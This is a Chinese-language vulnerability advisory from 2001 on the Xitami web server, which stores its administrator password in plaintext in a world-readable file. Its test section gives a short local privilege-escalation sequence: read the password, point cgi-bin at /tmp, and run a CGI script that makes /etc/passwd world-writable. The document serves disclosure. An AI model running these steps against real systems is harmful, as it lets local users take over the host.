Xitami WEB服务器管理员密码以明文存储发布时间:2001-11-28 更新时间:2001-11-28 严重程度:高 威胁程度:本地管理员权限 错误类型:配置错误 利用方式:服务器模式 受影响系统 Xitami Webserver 2.4d9, 2.5b5 beta详细描述 Xitami WEB服务程序的管理员密码以明文方式存储在全局可读文件,本地用户可以使用此管理员密码控制xitami进程,服务程序然后可以重新配置来读取任意敏感文件或者执行任意命令。 测试代码 默认管理员密码存储在如下文件中: [lwcash@mathom xitami]$ ls -l defaults.aut -rw-r--r-- 1 root root 107 Nov 23 10:56 defaults.aut 用户可以从此文件中获得密码再重新配置WEB服务程序,如改变cgi-bin到 /tmp/cgi-bin.然后获得更高权利如: [lwcash@mathom ~ $] echo "#!/bin/sh" > /tmp/cgi-bin/test.cgi [lwcash@mathom ~ $] echo "chmod 666 /etc/passwd" >> /tmp/cgi-bin/test.cgi [lwcash@mathom ~ $] chmod 555 /tmp/cgi-bin/test.cgi 执行http://localhost/tmp/cgi-bin/test.cgi 就可以执行命令。 解决方案 尚无 相关信息 Larry W. Cashdollar (lwc@vapid.dhs.org) 参考:http://archives.neohapsis.com/archives/bugtraq/2001-11/0217.html WEB页面:http://www.imatix.com |
